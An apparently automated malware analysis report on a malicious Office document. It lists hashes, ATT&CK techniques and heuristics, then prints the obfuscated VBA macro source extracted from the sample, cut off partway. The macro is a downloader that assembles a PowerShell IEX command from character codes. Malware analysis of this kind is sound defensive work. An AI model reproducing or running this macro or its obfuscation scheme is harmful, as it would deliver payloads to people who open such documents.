Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 89b5b09d3025d70f…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 83.9 KB
First seen: 2019-08-04
MD5: 866ca94d47077fcfe79483ec9ada9986
SHA-1: d48dc591702682b36c7d8d5d652f41daa629751d
SHA-256: 89b5b09d3025d70f8ccbefa6534803ae3a0ee5938608db901fa6ff930225bda9
Risk score: 162

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1059.001 Command and Scripting Interpreter: PowerShell
  • T1204.002 User Execution: Malicious File
  • T1566.001 Phishing: Spearphishing Attachment

The sample is an OLE document with VBA macros, including an AutoOpen function and a Shell() call, indicating malicious intent. The VBA script constructs and executes a PowerShell command to download content from a URL and execute it. This suggests the document is a downloader for a second-stage payload.

Heuristics (5)

  • VBA macros detected (severity: medium; 2 related findings) [OLE_VBA_MACROS]
    Document contains VBA macro code.
  • Shell() call in VBA (severity: critical) [OLE_VBA_SHELL]
    The VBA code calls Shell(), which launches an external process.
  • AutoOpen macro (severity: high) [OLE_VBA_AUTOOPEN]
    An AutoOpen procedure is present, so the macro runs as soon as the document is opened with macros enabled.
  • OLE document has large unaccounted-for region (severity: high) [OLE_SLACK_ANOMALY]
    OLE file is 85,898 bytes but its declared streams total only 35,059 bytes; the remaining 50,839 bytes (59%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • Embedded URL (severity: info) [EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 17071 bytes
SHA-256: 89652d53b4476c7373b3084ee0607b71bcd87fd12ffa6bc314fdb9182ad8a69d

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "KlbsIzDzno"
Function KQwHrkTIVY()
On Error Resume Next
For Each sZtXMk In wVCRsq
wqJRw = (JMXzM * 90041 + 60024 * CInt(ADqYa - CDbl(63204)) * 52220 * Oct(89350))
YanviL = zBhcTD = FYjjj
uKRFZ = 95972 + Atn(34607) / 22880 / Round(87179) / 34626 / CInt(iDNlr)
Next
MtrpXlk = "OwerSHe" + "ll IEX(" + "[Str" + "ing]::jOin"
For Each baBsB In NCwwi
zrAvsj = (IiVkt * 36779 + 8006 * CInt(XtPqjO - CDbl(26510)) * 15981 * Oct(11652))
JswECb = jbtaJ = LiXjcF
HZzcpJ = 66889 + Atn(11250) / 98229 / Round(43234) / 72388 / CInt(uQiqOD)
Next
WoUni = "( '',((50 , 10" + "3, 124 ,121," + "67 ," + "68 ,120,5" + "4 , 43, " + "54, "
For Each ujJrKI In FDMLi
CQXkvW = (tsvkE * 15907 + 83521 * CInt(XdnIf - CDbl(92929)) * 21158 * Oct(11826))
hnTbDf = nrAjdt = usomBn
mBRwi = 50691 + Atn(47414) / 5884 / Round(99166) / 78960 / CInt(KZCICn)
Next
pnjfU = "120,115 , 97 ," + "59,121, 116 , 1" + "24 ,115 , 1" + "17,9" + "8,5" + "4 , 10"
For Each NCzNIL In iftQqJ
SYulC = (UEUksL * 77433 + 37473 * CInt(vmpBw - CDbl(77710)) * 72369 * Oct(54798))
tFMEv = mJfisA = XAKVI
MVwWSJ = 68554 + Atn(12659) / 51022 / Round(78751) / 24181 / CInt(jvVrw)
Next
wiROvT = "0 , 1" + "19, 1" + "20,114, 12" + "1 ,123, 45,5"
For Each QJpzi In FbTnPp
bfEPEz = (uuLYMU * 36613 + 26965 * CInt(EmfDt - CDbl(10010)) * 98238 * Oct(85597))
mRRqq = rkwlpc = QuNWVw
lOMrQ = 28095 + Atn(2541) / 68193 / Round(73801) / 93860 / CInt(jLASf)
Next
PRLwqGuaw = "0,99, 69," + " 79, 8" + "1, 82,54" + " , 43 , 54,12" + "0,11"
For Each DEPhb In hYiYV
pXjAci = (Eaabu * 14878 + 96922 * CInt(OIRjw - CDbl(27076)) * 92546 * Oct(37384))
iiJsi = hpfzw = mfjWu
rccVad = 39974 + Atn(36997) / 31957 / Round(34138) / 85809 / CInt(XtDSS)
Next
jiAFRPz = "5,97 , 59, " + "121," + "116,124,115," + " 117 , 98" + ", 5" + "4, 69,1" + "11,10" + "1,98, 11"
For Each UfaHtl In KBbcc
JDmErp = (IjXLB * 29793 + 94918 * CInt(ZDVUN - CDbl(78899)) * 3397 * Oct(28808))
jiqGP = srnjiT = pMcFln
OFioH = 70076 + Atn(97513) / 12655 / Round(14132) / 30165 / CInt(IolUIw)
Next
luJmFwbH = "5 , 123 ," + " 56,88 ,1" + "15, 98 , 5" + "6, 65, 115" + ", 116 , 8" + "5, " + "12" + "2 "
KQwHrkTIVY = MtrpXlk + WoUni + pnjfU + wiROvT + PRLwqGuaw + jiAFRPz + luJmFwbH
End Function
Function fYDPD()
On Error Resume Next
For Each sFiUN In OooOIr
DOHmi = (Bzfcm * 68993 + 46549 * CInt(aizUEd - CDbl(97003)) * 87439 * Oct(65449))
urwZSv = zPIpth = qEzHMc
kpooJp = 87767 + Atn(8594) / 26930 / Round(17630) / 18712 / CInt(drmGcj)
Next
oEXVswSAR = ",127" + ",115 ,120,98" + " , 45" + ", 50,6" + "7 ,123"
For Each roUQBj In Aizjqj
kKBJl = (GrtBw * 61567 + 26421 * CInt(HDwVb - CDbl(56166)) * 71180 * Oct(8182))
ZnHNo = EhSdb = hkwqXd
uSRVS = 85776 + Atn(86692) / 51005 / Round(3513) / 22807 / CInt(DUjuc)
Next
KLBpf = ",9" + "9 , 112" + ", " + "71, 5" + "4 ,"
For Each ivRbp In jCmKZ
BiDzk = (wISoU * 91947 + 78809 * CInt(VDZGM - CDbl(74823)) * 16271 * Oct(51083))
cLZFw = SjhTHA = LDjWzT
paVmm = 98140 + Atn(55348) / 55798 / Round(60880) / 95802 / CInt(KbSboK)
Next
Avzoh = "43," + " 5" + "4 , 49 , 126 , " + "98, 98 ,102," + "44 " + ", 57 ,57, 98,11"
For Each wXAIm In hCosWX
poXWBp = (TzIpAk * 62259 + 94634 * CInt(OkOZT - CDbl(98955)) * 92964 * Oct(5410))
ntFjKk = IHzVD = ZwXkwP
HCwkd = 49115 + Atn(14876) / 14456 / Round(95822) / 43751 / CInt(sUpOwh)
Next
PwzJQRvc = "0 , 12" + "4, 113," + " 119," + " 97, 116 ," + "123 , 5" + "6," + " 117,1"
For Each oXirci In VSKQBi
jrZlz = (GldzK * 71315 + 15220 * CInt(jGLCqA - CDbl(19085)) * 84548 * Oct(54705))
aNIIG = rwnoLc = dzMdD
jhrazl = 23432 + Atn(99160) / 27556 / Round(20948) / 66066 / CInt(pPJKjM)
Next
LUEhT = "21 ,123 , 57 " + ",68,122 , 1" + "14, 94 , " + "35 ,"
fYDPD = oEXVswSAR + KLBpf + Avzoh + PwzJQRvc + LUEhT
End Function
Function zVMCZXrS()
On Error Resume Next
For Each ijHOzS In GqiCd
Gzsij = (KWuzcl * 10433 + 96181 * CInt(NHSPA - CDbl(61983)) * 47854 * Oct(27249))
StHffW = LhLkr = abwBa
ifcrUv = 86010 + Atn(67060) / 30310 / Round(74518) / 56913 / CInt(hjQPpi)
Next
inVGq = " 113,110 ," + "57 ,86, " + "126 , 98 ,98" + ",102
... (truncated)